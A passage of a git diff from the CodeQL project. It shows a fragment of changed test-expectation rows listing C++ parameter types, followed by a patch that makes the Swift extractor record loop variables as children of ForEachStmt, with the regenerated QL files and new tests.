basic_string & | -| stl.h:259:12:259:29 | basic_stringstream | 0 | const basic_string, allocator> & | | stl.h:263:23:263:31 | operator= | 0 | basic_stringstream && | -| stl.h:263:23:263:31 | operator= | 0 | basic_stringstream, allocator> && | | stl.h:265:8:265:11 | swap | 0 | basic_stringstream & | -| stl.h:265:8:265:11 | swap | 0 | basic_stringstream, allocator> & | | stl.h:268:8:268:10 | str | 0 | const basic_string & | -| stl.h:268:8:268:10 | str | 0 | const basic_string, allocator> & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator, allocator>> & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | @@ -1041,9 +918,6 @@ getParameterTypeName | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | -| stl.h:294:12:294:17 | vector | 1 | const allocator & | -| stl.h:294:12:294:17 | vector | 1 | const allocator & | -| stl.h:294:12:294:17 | vector | 1 | const allocator>> & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | @@ -1051,20 +925,13 @@ getParameterTypeName | stl.h:295:3:295:8 | vector | 0 | size_type | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | -| stl.h:295:3:295:8 | vector | 1 | const int & | -| stl.h:295:3:295:8 | vector | 1 | const short & | -| stl.h:295:3:295:8 | vector | 2 | const allocator & | -| stl.h:295:3:295:8 | vector | 2 | const allocator & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:296:101:296:106 | vector | 0 | func:0 | | stl.h:296:101:296:106 | vector | 1 | func:0 | -| stl.h:296:101:296:106 | vector | 2 | const allocator & | | stl.h:296:101:296:106 | vector | 2 | const class:1 & | | stl.h:301:11:301:19 | operator= | 0 | const vector & | -| stl.h:301:11:301:19 | operator= | 0 | const vector> & | | stl.h:302:11:302:19 | operator= | 0 | vector && | -| stl.h:302:11:302:19 | operator= | 0 | vector> && | | stl.h:303:106:303:111 | assign | 0 | func:0 | | stl.h:303:106:303:111 | assign | 1 | func:0 | | stl.h:306:8:306:13 | assign | 0 | size_type | @@ -1073,9 +940,6 @@ getParameterTypeName | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | -| stl.h:306:8:306:13 | assign | 1 | const float & | -| stl.h:306:8:306:13 | assign | 1 | const int & | -| stl.h:306:8:306:13 | assign | 1 | const int *const & | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | @@ -1083,15 +947,11 @@ getParameterTypeName | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:318:13:318:14 | at | 0 | size_type | -| stl.h:327:8:327:16 | push_back | 0 | const MyPair & | -| stl.h:327:8:327:16 | push_back | 0 | const MyVectorContainer & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:328:8:328:16 | push_back | 0 | class:0 && | -| stl.h:328:8:328:16 | push_back | 0 | int && | | stl.h:331:12:331:17 | insert | 0 | const_iterator | | stl.h:331:12:331:17 | insert | 1 | class:0 && | -| stl.h:331:12:331:17 | insert | 1 | int && | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 1 | func:0 | @@ -1102,38 +962,21 @@ getParameterTypeName | stl.h:335:37:335:43 | emplace | 1 | func:0 && | | stl.h:336:33:336:44 | emplace_back | 0 | func:0 && | | stl.h:338:8:338:11 | swap | 0 | vector & | -| stl.h:338:8:338:11 | swap | 0 | vector> & | | stl.h:351:12:351:21 | shared_ptr | 0 | class:0 * | -| stl.h:351:12:351:21 | shared_ptr | 0 | int * | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | -| stl.h:369:12:369:21 | unique_ptr | 0 | A * | | stl.h:369:12:369:21 | unique_ptr | 0 | class:0 * | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | -| stl.h:380:52:380:62 | make_unique | 0 | int && | -| stl.h:380:52:380:62 | make_unique | 0 | int && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | -| stl.h:382:52:382:62 | make_shared | 0 | int && | -| stl.h:382:52:382:62 | make_shared | 0 | int && | -| stl.h:396:3:396:3 | pair | 0 | char *const & | -| stl.h:396:3:396:3 | pair | 0 | char *const & | -| stl.h:396:3:396:3 | pair | 0 | const char *const & | -| stl.h:396:3:396:3 | pair | 0 | const char *const & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | -| stl.h:396:3:396:3 | pair | 0 | const pair & | -| stl.h:396:3:396:3 | pair | 1 | char *const & | -| stl.h:396:3:396:3 | pair | 1 | char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | @@ -1152,24 +995,12 @@ getParameterTypeName | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:399:8:399:11 | swap | 0 | pair & | -| stl.h:402:72:402:72 | make_pair | 0 | char *&& | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | -| stl.h:402:72:402:72 | make_pair | 0 | pair && | -| stl.h:402:72:402:72 | make_pair | 1 | char *&& | -| stl.h:402:72:402:72 | make_pair | 1 | char *&& | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | @@ -1177,9 +1008,7 @@ getParameterTypeName | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:422:3:422:5 | map | 0 | const map & | -| stl.h:422:3:422:5 | map | 0 | const map, allocator>> & | | stl.h:426:8:426:16 | operator= | 0 | const map & | -| stl.h:426:8:426:16 | operator= | 0 | const map, allocator>> & | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:436:6:436:7 | at | 0 | const key_type & | @@ -1209,19 +1038,14 @@ getParameterTypeName | stl.h:454:30:454:45 | insert_or_assign | 2 | func:0 && | | stl.h:456:12:456:16 | erase | 0 | iterator | | stl.h:459:8:459:11 | swap | 0 | map & | -| stl.h:459:8:459:11 | swap | 0 | map, allocator>> & | | stl.h:462:27:462:31 | merge | 0 | map & | -| stl.h:462:27:462:31 | merge | 0 | map>> & | | stl.h:465:12:465:15 | find | 0 | const key_type & | | stl.h:468:12:468:22 | lower_bound | 0 | const key_type & | | stl.h:470:12:470:22 | upper_bound | 0 | const key_type & | | stl.h:473:28:473:38 | equal_range | 0 | const key_type & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | -| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, equal_to, allocator>> & | -| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, hash, equal_to, allocator>>> & | | stl.h:494:18:494:26 | operator= | 0 | const unordered_map & | -| stl.h:494:18:494:26 | operator= | 0 | const unordered_map, equal_to, allocator>> & | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:504:16:504:17 | at | 0 | const key_type & | @@ -1260,17 +1084,13 @@ getParameterTypeName | stl.h:522:30:522:45 | insert_or_assign | 2 | func:0 && | | stl.h:524:12:524:16 | erase | 0 | iterator | | stl.h:527:8:527:11 | swap | 0 | unordered_map & | -| stl.h:527:8:527:11 | swap | 0 | unordered_map, equal_to, allocator>> & | | stl.h:530:37:530:41 | merge | 0 | unordered_map & | -| stl.h:530:37:530:41 | merge | 0 | unordered_map>> & | | stl.h:533:12:533:15 | find | 0 | const key_type & | | stl.h:536:28:536:38 | equal_range | 0 | const key_type & | | stl.h:555:3:555:5 | set | 0 | const set & | -| stl.h:555:3:555:5 | set | 0 | const set, allocator> & | | stl.h:557:33:557:35 | set | 0 | func:0 | | stl.h:557:33:557:35 | set | 1 | func:0 | | stl.h:560:8:560:16 | operator= | 0 | const set & | -| stl.h:560:8:560:16 | operator= | 0 | const set, allocator> & | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:569:36:569:47 | emplace_hint | 0 | const_iterator | @@ -1284,20 +1104,16 @@ getParameterTypeName | stl.h:574:38:574:43 | insert | 1 | func:0 | | stl.h:576:12:576:16 | erase | 0 | iterator | | stl.h:579:8:579:11 | swap | 0 | set & | -| stl.h:579:8:579:11 | swap | 0 | set, allocator> & | | stl.h:582:27:582:31 | merge | 0 | set & | -| stl.h:582:27:582:31 | merge | 0 | set> & | | stl.h:585:12:585:15 | find | 0 | const key_type & | | stl.h:588:12:588:22 | lower_bound | 0 | const key_type & | | stl.h:590:12:590:22 | upper_bound | 0 | const key_type & | | stl.h:592:28:592:38 | equal_range | 0 | const key_type & | | stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set & | -| stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set, equal_to, allocator> & | | stl.h:611:33:611:45 | unordered_set | 0 | func:0 | | stl.h:611:33:611:45 | unordered_set | 1 | func:0 | | stl.h:611:33:611:45 | unordered_set | 2 | size_type | | stl.h:614:18:614:26 | operator= | 0 | const unordered_set & | -| stl.h:614:18:614:26 | operator= | 0 | const unordered_set, equal_to, allocator> & | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:623:36:623:47 | emplace_hint | 0 | const_iterator | @@ -1311,21 +1127,17 @@ getParameterTypeName | stl.h:628:38:628:43 | insert | 1 | func:0 | | stl.h:630:12:630:16 | erase | 0 | iterator | | stl.h:633:8:633:11 | swap | 0 | unordered_set & | -| stl.h:633:8:633:11 | swap | 0 | unordered_set, equal_to, allocator> & | | stl.h:636:37:636:41 | merge | 0 | unordered_set & | -| stl.h:636:37:636:41 | merge | 0 | unordered_set> & | | stl.h:639:12:639:15 | find | 0 | const key_type & | | stl.h:641:28:641:38 | equal_range | 0 | const key_type & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:678:33:678:38 | format | 0 | format_string | | stl.h:678:33:678:38 | format | 0 | format_string | -| stl.h:678:33:678:38 | format | 1 | char *&& | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 0 | format_string | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | func:0 && | -| stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | int & | | string.cpp:17:6:17:9 | sink | 0 | const char * | | string.cpp:18:6:18:9 | sink | 0 | const string & | | string.cpp:19:6:19:9 | sink | 0 | const char * | @@ -1344,7 +1156,6 @@ getParameterTypeName | structlikeclass.cpp:5:7:5:7 | operator= | 0 | StructLikeClass && | | structlikeclass.cpp:5:7:5:7 | operator= | 0 | const StructLikeClass & | | structlikeclass.cpp:8:2:8:16 | StructLikeClass | 0 | int | -| swap1.cpp:14:9:14:9 | move | 0 | Class & | | swap1.cpp:14:9:14:9 | move | 0 | func:0 & | | swap1.cpp:24:9:24:13 | Class | 0 | Class && | | swap1.cpp:25:9:25:13 | Class | 0 | const Class & | @@ -1355,7 +1166,6 @@ getParameterTypeName | swap1.cpp:53:14:53:17 | swap | 0 | Class & | | swap1.cpp:61:10:61:13 | swap | 0 | Class & | | swap1.cpp:61:10:61:13 | swap | 1 | Class & | -| swap2.cpp:14:9:14:9 | move | 0 | Class & | | swap2.cpp:14:9:14:9 | move | 0 | func:0 & | | swap2.cpp:24:9:24:13 | Class | 0 | Class && | | swap2.cpp:25:9:25:13 | Class | 0 | const Class & | @@ -1367,9 +1177,7 @@ getParameterTypeName | swap2.cpp:61:10:61:13 | swap | 0 | Class & | | swap2.cpp:61:10:61:13 | swap | 1 | Class & | | swap.h:4:20:4:23 | swap | 0 | func:0 & | -| swap.h:4:20:4:23 | swap | 0 | int & | | swap.h:4:20:4:23 | swap | 1 | func:0 & | -| swap.h:4:20:4:23 | swap | 1 | int & | | taint.cpp:4:6:4:21 | arithAssignments | 0 | int | | taint.cpp:4:6:4:21 | arithAssignments | 1 | int | | taint.cpp:22:5:22:13 | increment | 0 | int | @@ -1554,7 +1362,6 @@ getParameterTypeName | taint.cpp:783:5:783:11 | fopen_s | 2 | const char * | | taint.cpp:785:6:785:15 | fopen_test | 0 | char * | | vector.cpp:13:6:13:9 | sink | 0 | int | -| vector.cpp:14:27:14:30 | sink | 0 | vector, allocator>, allocator, allocator>>> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:16:6:16:37 | test_range_based_for_loop_vector | 0 | int | From 814218c7a830f8c9aaec19ed1fb24ebca8622607 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 28 Nov 2024 10:52:17 +0100 Subject: [PATCH 0754/1267] Swift: extract variables as children of `ForEachStmt` --- .../extractor/translators/StmtTranslator.cpp | 11 ++++++++++ swift/ql/.generated.list | 15 ++++++++----- swift/ql/.gitattributes | 7 ++++++- .../swift/elements/stmt/ForEachStmt.qll | 1 + .../codeql/swift/generated/ParentChild.qll | 14 +++++++++---- swift/ql/lib/codeql/swift/generated/Raw.qll | 5 +++++ .../swift/generated/stmt/ForEachStmt.qll | 21 +++++++++++++++++++ swift/ql/lib/swift.dbscheme | 7 +++++++ .../stmt/ForEachStmt/ForEachStmt.expected | 3 +++ .../generated/stmt/ForEachStmt/ForEachStmt.ql | 20 ++++++++++++++++++ .../ForEachStmt_getIteratorVar.expected | 2 ++ .../ForEachStmt/ForEachStmt_getIteratorVar.ql | 7 +++++++ .../ForEachStmt/ForEachStmt_getLabel.expected | 0 .../stmt/ForEachStmt/ForEachStmt_getLabel.ql | 7 +++++++ .../ForEachStmt_getNextCall.expected | 2 ++ .../ForEachStmt/ForEachStmt_getNextCall.ql | 7 +++++++ .../ForEachStmt_getVariable.expected | 5 +++++ .../ForEachStmt/ForEachStmt_getVariable.ql | 7 +++++++ .../ForEachStmt/ForEachStmt_getWhere.expected | 1 + .../stmt/ForEachStmt/ForEachStmt_getWhere.ql | 7 +++++++ .../stmt/ForEachStmt/MISSING_SOURCE.txt | 4 ---- .../generated/stmt/ForEachStmt/for.swift | 19 +++++++++++++++++ .../expr/methodlookup/PrintAst.expected | 2 ++ swift/schema.py | 1 + 24 files changed, 161 insertions(+), 14 deletions(-) create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql delete mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift diff --git a/swift/extractor/translators/StmtTranslator.cpp b/swift/extractor/translators/StmtTranslator.cpp index a433c93f406..f46411e6f12 100644 --- a/swift/extractor/translators/StmtTranslator.cpp +++ b/swift/extractor/translators/StmtTranslator.cpp @@ -77,6 +77,17 @@ codeql::ForEachStmt StmtTranslator::translateForEachStmt(const swift::ForEachStm entry.iteratorVar = dispatcher.fetchLabel(stmt.getIteratorVar()); entry.where = dispatcher.fetchOptionalLabel(stmt.getWhere()); entry.nextCall = dispatcher.fetchOptionalLabel(stmt.getNextCall()); + auto add_variable = [&](swift::VarDecl* var) { + entry.variables.push_back(dispatcher.fetchLabel(var)); + }; + if (auto pattern = stmt.getPattern()) { + pattern->forEachVariable(add_variable); + } + if (auto iteratorVar = stmt.getIteratorVar()) { + for (auto i = 0u; i < iteratorVar->getNumPatternEntries(); ++i) { + iteratorVar->getPattern(i)->forEachVariable(add_variable); + } + } return entry; } diff --git a/swift/ql/.generated.list b/swift/ql/.generated.list index da39f2f2fe7..dec8b487f0b 100644 --- a/swift/ql/.generated.list +++ b/swift/ql/.generated.list @@ -463,7 +463,7 @@ lib/codeql/swift/elements/stmt/DoCatchStmt.qll a4639b674880e85d15ef4077370eb2ff2 lib/codeql/swift/elements/stmt/DoStmt.qll 2117eb68a82bde082fc06b44d7bdabd6d773abda95555b81e92f6d409a93b462 c5ec1fba5ba562629863ac6d1a15f9bbd8dce9f59326f580997352b47f9f2a90 lib/codeql/swift/elements/stmt/FailStmt.qll 0dc6467b2e6b4852ad6054122601c445f31c5e9c9837ceac132849a37119f7b5 0fac97257b7b2e453c484ca0212e61e655e2b2fa456f030ce159806dee048909 lib/codeql/swift/elements/stmt/FallthroughStmt.qll f7bfad479ed2f3011a4e8ebe3e4a7f3e6b7f832518ac4d2401122b8be32bbc91 2daabb70b723d9f95d4b120ec2774df8c2ba315f9b17f944a65d306f71c0a70f -lib/codeql/swift/elements/stmt/ForEachStmt.qll 70fb1f12a95c14eebd9cb30c53898ca044843ed6b14569f54e52697af7b39f59 6483f1941b7a97f4cc919c578b25da69b783dc9b3ebe4a2839702553ff2f64fb +lib/codeql/swift/elements/stmt/ForEachStmt.qll 328f1036257affc8b4d0d34767d059a33eca599fe7fd69ce4ac9824d3985143c c9a79da4742b8dac82c2760e0c15809dcc237b09603798b9c8368f02e20c5138 lib/codeql/swift/elements/stmt/GuardStmt.qll 69d3a945ec1d7bad4d9157656c5a2388584afa013771e6657313e39b28284b4a 50812bd09f77d8aba1071f03f073bed8951b1b9bb940b424c91f7f10095333cd lib/codeql/swift/elements/stmt/IfStmt.qll f60fb6be6f900c9e7c1a7ae84f0886f6fd5e70cbcc6c77c78d70ed2a62de77a9 a97ae07ef314b199baafa47af4cdc302ebf2f72205a14a28fdfc7db5ce4cfd47 lib/codeql/swift/elements/stmt/LabeledConditionalStmt.qll 64e4b4bedfc1fe74a7685213b22cb43098f669ec2c2947d9096a73e1e90104f3 28459d17878789184c8833eb202cb736ea7f267d728790561b57f60b4b9a2ce9 @@ -709,10 +709,10 @@ lib/codeql/swift/generated/Locatable.qll 1d37fa20de71c0b9986bfd7a7c0cb82ab7bf3fd lib/codeql/swift/generated/Location.qll 5e20316c3e480ddfe632b7e88e016c19f10a67df1f6ae9c8f128755a6907d6f5 5a0af2d070bcb2ed53d6d0282bf9c60dc64c2dce89c21fdd485e9c7893c1c8fa lib/codeql/swift/generated/MacroRole.qll 0d8fa6b0b6e2045d9097a87d53888cae2ea5371b2fa7d140341cf206f575b556 ea3b8a7c0a88851809f9a5a5aa80b0d2da3c4779bb29044cdba2b60246a2722c lib/codeql/swift/generated/OtherAvailabilitySpec.qll d9feaa2a71acff3184ca389045b0a49d09156210df0e034923d715b432ad594b 046737621a8bcf69bf805afb0cff476bd15259f12f0d77fce3206dd01b31518f -lib/codeql/swift/generated/ParentChild.qll d1814f2bad4c2ba9242ce49fe6fb8564ac99fc1fd3a7d12aa55e5c6dd7bb529b 1a2075b731d07a5e3c6a69d001796c8de925069d839671a294c9cba6c3db724a +lib/codeql/swift/generated/ParentChild.qll b65c29ba8c3e13baac44a32d2521a11f07aeb7d33415aa9a91a7f6255a744415 0fe73d06c96194d5a0da19c9348a46d9f8fbf630fee5de3dc96e997c595c362e lib/codeql/swift/generated/PlatformVersionAvailabilitySpec.qll dc17b49a90a18a8f7607adf2433bc8f0c194fa3e803aa3822f809d4d4fbd6793 be48ea9f8ae17354c8508aaed24337a9e57ce01f288fece3dcecd99776cabcec lib/codeql/swift/generated/PureSynthConstructors.qll bc31a6c4d142fa3fbdcae69d5ba6f1cec00eb9ad92b46c8d7b91ebfa7ef6c1f4 bc31a6c4d142fa3fbdcae69d5ba6f1cec00eb9ad92b46c8d7b91ebfa7ef6c1f4 -lib/codeql/swift/generated/Raw.qll 118b43fedd4265b5aa15c33ef01a2f5a5db6e5597f95bef1078a01c3ff8da983 075aec2c8b232f0361ebf63f07ae9b66163f3975e6023583fb0fa2e40b979a33 +lib/codeql/swift/generated/Raw.qll 2c5cecbc73f87d81a7e6dd6e125115619c1b034712f1906fed084e997bb3fe05 9653595693da55953d7743fbecce33d16910e3b6737c654311f1e34d27ad7f0b lib/codeql/swift/generated/Synth.qll 31e318c6e156848c85a2a2664695b48b5e93c57c9bb22fa29d027069907b3ab0 8655ffcf772f55284b93f1d7f8e1b3d497a9744d5f2e0c17bc322c1fdf8bdba8 lib/codeql/swift/generated/SynthConstructors.qll 3e53c7853096020219c01dae85681fe80b34938d198a0ff359a209dda41c5ed7 3e53c7853096020219c01dae85681fe80b34938d198a0ff359a209dda41c5ed7 lib/codeql/swift/generated/UnknownFile.qll 247ddf2ebb49ce5ed4bf7bf91a969ddff37de6c78d43d8affccaf7eb586e06f2 452b29f0465ef45e978ef8b647b75e5a2a1e53f2a568fc003bc8f52f73b3fa4d @@ -915,7 +915,7 @@ lib/codeql/swift/generated/stmt/DoCatchStmt.qll 93c2a47088a2849ccf1a5647eba39c1a lib/codeql/swift/generated/stmt/DoStmt.qll 27be70a901a20831fea3d3dcf45d5ba9048043b1894cb04c09dfb3d1c0241cef 48a258a27677170e1d5530eb0001b6c043d96a92e0d056e6fb428b4d7ac4cadd lib/codeql/swift/generated/stmt/FailStmt.qll 72bfd7dc0f3f8219f3cce1a34567fdd127823e2cf42274e171f7ac96eb18afcd cb1027b33e5b601317546acb8915a5985e04b5376ecaea012b3ecdffc22ae814 lib/codeql/swift/generated/stmt/FallthroughStmt.qll 7aa70d87443d03b0ba7ed7c7b57b501abb00a32c5943c99c40735d023cf7a9ef 6451f355980409d0d7d991b9e241324ee2b68be3838440f206f734470c7188fc -lib/codeql/swift/generated/stmt/ForEachStmt.qll b5cadd1b5daa3601d094e79143cf85a731966a3c1e1c6567bcd0d87f33f9196f 13a494dd3cbbc34c8d1caeda7f279c35d971b8fb49823c89cf71675f7d76e6a4 +lib/codeql/swift/generated/stmt/ForEachStmt.qll d2e4bd83e68a432515284273d682ee47dc61860ff1b0769b9c3775ceb8d46140 848ed0efec1a40df27259492c4df1603d6bfcd8622038beac8d9145fc6863de6 lib/codeql/swift/generated/stmt/GuardStmt.qll a957b2d83c92ac7ed18f76faa35cb71b10ce0dcbb88447b57dcdc034341b6fcc 518fad136831573112edf3836e852c82009a654ce256077d953ddc6b86231efb lib/codeql/swift/generated/stmt/IfStmt.qll a1d1af8679fb0881bace45c251f96f3bbb07e8a0312dd5ecab4fc2c07e491682 bad75ae703b23d1b8869be108f095ec242996cdde0dd90b8c1dabe643869da60 lib/codeql/swift/generated/stmt/LabeledConditionalStmt.qll c05bbbdba0ad8e33afdae3a8b201276d95c2b4d1e43b9b58aa4aa17765dc7ca4 c30a5a1350172459bf67760dc912460ecc4f581dd927a98a068d95cb0905f0d9 @@ -1232,7 +1232,12 @@ test/extractor-tests/generated/stmt/DoCatchStmt/MISSING_SOURCE.txt 35fb32ea53931 test/extractor-tests/generated/stmt/DoStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/FailStmt/FailStmt.ql db2d21fe1b01949180ff11416f2dc0a6a561f9ac9e6a5654156f947c584971de 2cf787b54819077dd2b4da870b722396ebf953e05bf0b1c393affef2b1fe11ba test/extractor-tests/generated/stmt/FallthroughStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d -test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql 093a6619940636974e2a59f085937f9fa8645a134199c130ee99babfd2c1f1a0 068daffb2da1be9135eb818190926af3958d503c3c61de2659c0c0e167b2d11c +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql 1b8689dda5defd45c8bb743b30d723ed7b0c80ca54b81fb0f5fcf76620ec4ef4 1e48e40cff37194e0ea2b69997177237145fa1070e84c8f701a03d71416652b5 +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql 1cf0663cd16886d4361bedad93759ab84fcaf54d5fbf16d7d2f4108f74c38683 129778f5f36d10e8a10452f333304fef9b95919cfe367ce6ff7309e2d3f3ab3b +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql 503106f20025ec479ffe46daf13ff80f5d824b657c43da8185ae2d74af8740a3 551e33f70028268e3b3790c17907101be768c42811b62978ed10ffc0a65e25d0 +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql 749149b5164f493bb49726e1d54cdd1c85607566c0ba7adfc3514ea953b1f40e 1695a631aeeb47e6a0d22ec18d713f1fe2f730684269fc6e50c70020a78fbf3c +test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql 536af56264054a7af626a5ca4bb5bcc5b8f13299d11c499a110e4f12e2c166b6 bfd8b355342b0a03ced022b31d39e9adc6d7820a28394315392a9e2fc7647555 test/extractor-tests/generated/stmt/GuardStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/IfStmt/MISSING_SOURCE.txt 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d 35fb32ea5393152eb7a875b20b4e3e4b8c7a997a8959c32417140d57a16a052d test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.ql 46b702865ef1dc4d9d8332a3d68ba295a1f8ce9737dbcb07a5ef4c701c021789 07eaec1abc763a4f2339466fd0f06d12c4ca21d9eeb21ab1f7366916dafc4854 diff --git a/swift/ql/.gitattributes b/swift/ql/.gitattributes index 43efa50e93d..ab478ec526b 